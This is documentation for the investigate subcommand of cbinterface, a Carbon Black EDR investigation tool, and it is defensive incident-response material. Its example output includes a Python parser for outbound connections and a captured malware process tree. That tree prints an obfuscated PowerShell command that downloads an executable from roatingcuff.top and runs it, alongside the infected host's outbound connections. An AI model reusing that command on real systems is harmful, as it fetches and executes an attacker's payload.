ProcessInvestigation
Use the process inspection interface to carve and parse process events. You can use any combination of the optional arguments together, and these arguments are also applied to every process that is recursively walked with the `-w` (`--walk-tree`) option.
NOTE: If you do not supply any optional arguments, the following inspection arguments are applied by default:

```
  -i, --proc-info          show process information
  -t, --process-tree       print the process tree with this process as the root.
  -a, --process-ancestry   print the process ancestry
  -c, --show-children      print process children event details
  -nc, --netconns          print network connections
  -fm, --filemods          print file modifications
  -rm, --regmods           print registry modifications
  -ml, --modloads          print modloads
  -sl, --scriptloads       print scriptloads (PSC)
  -cp, --crossprocs        print crossprocs
```
All process inspection arguments:

```
$ cbinterface i -h
usage: cbinterface investigate [-h] [-i] [-w] [-t] [-a] [-c] [-nc]
                               [-fm] [-rm] [-ml] [-sl] [-cp] [-rpe]
                               [--json]
                               process_guid_options

positional arguments:
  process_guid_options  the process GUID/segment to inspect. Segment is
                        optional.

optional arguments:
  -h, --help            show this help message and exit
  -i, --proc-info       show binary and process information
  -w, --walk-tree       Recursively walk, print, and inspect the process tree.
                        Specified arguments (ex. filemods) applied at every
                        process in tree. WARNING: can pull large datasets.
  -t, --process-tree    print the process tree with this process as the root.
  -a, --process-ancestry
                        print the process ancestry
  -c, --show-children   only print process children event details
  -nc, --netconns       print network connections
  -fm, --filemods       print file modifications
  -rm, --regmods        print registry modifications
  -ml, --modloads       print modloads
  -sl, --scriptloads    print scriptloads (PSC)
  -cp, --crossprocs     print crossprocs
  -rpe, --raw-print-events
                        do not format Cb events onto a single line. Print them
                        the way Cb does by default.
  --json                Combine all results into json document and print the
                        result.
```
The Carbon Black Response product breaks process events up into process "segments". You can inspect a single process segment by passing a Process object whose `process.current_segment` field is set to an existing segment. On the command line, this is done by appending the segment to the process GUID, like so:

```
cbinterface inspect 00006a99-0000-59ac-01d6-feff3879acfd/1612887600302
```

By default, if a single segment is not specified (the `current_segment` field is not set on the Process object), events from all segments are inspected.
I used PSC for all of these examples, but the commands are all interoperable.
```
cbinterface i 7W2FQEEY-02361dc7-000009d4-00000000-1d70b8a6f55bfa7 -i
```

```
$ cbinterface i 7W2FQEEY-02361dc7-000009d4-00000000-1d70b8a6f55bfa7 -a -t
------ Process Ancestry ------
2021-02-25 10:25:23.200000-0500: "C:\Windows\System32\WScript.exe" "C:\Users\NeoLite6\Downloads\RenamedBadNess\RenamedBadNess.js" | 7W2FQEEY-02361dc7-000009d4-00000000-1d70b8a6f55bfa7
2021-02-23 08:47:52.351000-0500: C:\Windows\Explorer.EXE | 7W2FQEEY-02361dc7-00000fd0-00000000-1d709ea7b218d27
2021-02-23 08:47:52.228000-0500: C:\Windows\system32\userinit.exe | 7W2FQEEY-02361dc7-00001368-00000000-1d709ea7b0ec532
2021-02-23 08:47:16.322000-0500: winlogon.exe | 7W2FQEEY-02361dc7-000002dc-00000000-1d709ea65a7ff1d

------ Process Execution Tree ------
"C:\Windows\System32\WScript.exe" "C:\Users\NeoLite6\Downloads\RenamedBadNess\RenamedBadNess.js" | 7W2FQEEY-02361dc7-000009d4-00000000-1d70b8a6f55bfa7
"C:\Windows\System32\cmd.exe" /c pOwEr^shEll -ex^ecution^pol^icy b^ypa^ss -n^oprof^ile -w h^idd^en $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://roatingcuff.top/leo3881/main.php','%temp%sDT76.exe'); & %temp%sDT76.exe & lKBAwPHfChLgeix | 7W2FQEEY-02361dc7-00000a20-00000000-1d70b8a6f8788d9
pOwErshEll -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://roatingcuff.top/leo3881/main.php','C:\Users\NeoLite6\AppData\Local\TempsDT76.exe'); | 7W2FQEEY-02361dc7-0000219c-00000000-1d70b8a6f996b9c
C:\Users\NeoLite6\AppData\Local\TempsDT76.exe | 7W2FQEEY-02361dc7-0000208c-00000000-1d70b8a71e4dff5
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | 7W2FQEEY-02361dc7-000004a4-00000000-1d70b8a6f8f5eea
```
Walk the process tree, printing network connections for every process, and grep for outbound connections:

```
$ cbinterface i 7W2FQEEY-02361dc7-000009d4-00000000-1d70b8a6f55bfa7 -w -nc | grep outbound
@2021-02-25 10:25:24.772000-0500: Established outbound TCP from 10.0.2.15:58460 to 104.21.31.165:80 (roatingcuff.top)
@2021-02-25 10:25:27.616000-0500: Established outbound TCP from 10.0.2.15:58461 to 158.69.7.238:443 (aws.amazon.com)
@2021-02-25 10:25:29.323000-0500: Established outbound TCP from 10.0.2.15:58467 to 164.90.143.105:80 (hipporest.best)
```
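A `grep` is enough for a quick look, but during triage it helps to turn the single-line netconn events into structured records so the remote destinations can be deduplicated and handed to blocklisting or correlation. The following Python is an added example, not code from cbinterface or this page: it parses lines in the shape shown above (the `inbound` and `UDP` variants are assumed to differ only in those words) and collects the unique outbound destinations.

```python
"""Parse the netconn lines printed by `cbinterface i ... -nc` (added example, not cbinterface code)."""
import re
from dataclasses import dataclass
from typing import Iterable, List, Optional, Tuple

# Line shape taken from the sample output above; inbound/UDP variants assumed to differ only in those words.
NETCONN_RE = re.compile(
    r"^@(?P<ts>\S+ \S+): Established (?P<direction>inbound|outbound) "
    r"(?P<proto>TCP|UDP) from (?P<lip>[\d.]+):(?P<lport>\d+) "
    r"to (?P<rip>[\d.]+):(?P<rport>\d+)(?: \((?P<domain>[^)]*)\))?$"
)

@dataclass(frozen=True)
class NetConn:
    timestamp: str
    direction: str
    proto: str
    local_ip: str
    local_port: int
    remote_ip: str
    remote_port: int
    domain: Optional[str]  # name in parentheses, if Cb resolved one

def parse_netconn(line: str) -> Optional[NetConn]:
    """Return a NetConn for a netconn line, or None for any other output line."""
    m = NETCONN_RE.match(line.strip())
    if not m:
        return None
    return NetConn(m["ts"], m["direction"], m["proto"], m["lip"], int(m["lport"]),
                   m["rip"], int(m["rport"]), m["domain"] or None)

def outbound_destinations(lines: Iterable[str]) -> List[Tuple[str, int, Optional[str]]]:
    """Unique (remote_ip, remote_port, domain) of outbound connections, in first-seen order."""
    seen: List[Tuple[str, int, Optional[str]]] = []
    for line in lines:
        conn = parse_netconn(line)
        if conn is None or conn.direction != "outbound":
            continue
        key = (conn.remote_ip, conn.remote_port, conn.domain)
        if key not in seen:
            seen.append(key)
    return seen

# Constructed sample: the three netconn lines from the walk above plus a tree header an unfiltered walk prints.
SAMPLE = """\
@2021-02-25 10:25:24.772000-0500: Established outbound TCP from 10.0.2.15:58460 to 104.21.31.165:80 (roatingcuff.top)
@2021-02-25 10:25:27.616000-0500: Established outbound TCP from 10.0.2.15:58461 to 158.69.7.238:443 (aws.amazon.com)
@2021-02-25 10:25:29.323000-0500: Established outbound TCP from 10.0.2.15:58467 to 164.90.143.105:80 (hipporest.best)
------ Process Execution Tree ------
""".splitlines()
```

Feed it the unfiltered output of `-w -nc` (for example via `sys.stdin`) and non-netconn lines such as tree headers are skipped rather than breaking the parse.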